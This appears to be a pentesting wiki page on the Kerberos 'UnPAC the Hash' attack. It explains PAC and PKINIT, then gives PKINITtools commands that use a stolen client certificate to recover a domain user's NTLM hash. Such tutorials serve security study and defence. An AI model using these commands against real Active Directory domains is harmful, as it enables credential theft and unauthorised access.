# UnPAC The Hash
The UnPAC The Hash attack relies on two things that I first have to define: the PAC and PKINIT.
* In the Kerberos Authentication protocol, a user's Kerberos tickets can contain a **Privilege Attribute Certificate (PAC)** that describes the user's security groups and privileges.
* **Public Key Cryptography for Initial Authentication in Kerberos (PKINIT)** is an extension in Kerberos Authentication that allows for certificate-based authentication.
{% hint style="info" %}
The PAC can also contain the NTLM hashes of the authenticating user, allowing users to switch the NTLM authentication when the target server doesn't support Kerberos.
{% endhint %}
When obtaining a Ticket Granting Ticket (TGT) using PKINIT, the Key Distribution Center (KDC) includes a session key and a PAC that includes the NTLM password hash of the authenticating user.
Using the TGT in a U2U and S4U2Self allows you to obtain a Kerberos Service Ticket (ST) with a PAC that can be unencrypted with the session key obtained earlier.
Once the PAC is decrypted, we can extract the NTLM hash.
## Exploit
#### Scenario
We have access to a certificate that can be used for client authentication for a domain user `ducky`.
Your goal is to obtain the NTLM password hash for `ducky` by authenticating with the certificate using PKINIT to obtain a Kerberos ticket and recover the NTLM hash from the Kerberos ticket.
{% tabs %}
{% tab title="PKINITtools" %}
{% embed url="" %}
{% code title="Linux (Attacker)" %}
```fish
## Authenticate using certificate and write output (ccache) to filename ducky
gettgtpkinit.py -cert-pfx ducky.pfx '[domain]/ducky' ducky
## Set the newly obtained ccache to the Kerberos credential cache environment variable
export KRB5CCNAME=/path/to/ducky.ccache
## Recover NT hash from the PAC
getnthash.py -key [encryption key from gettgtpkinit.py] '[domain]/ducky'
```
{% endcode %}
{% endtab %}
{% tab title="Rubeus" %}
{% endtab %}
{% endtabs %}
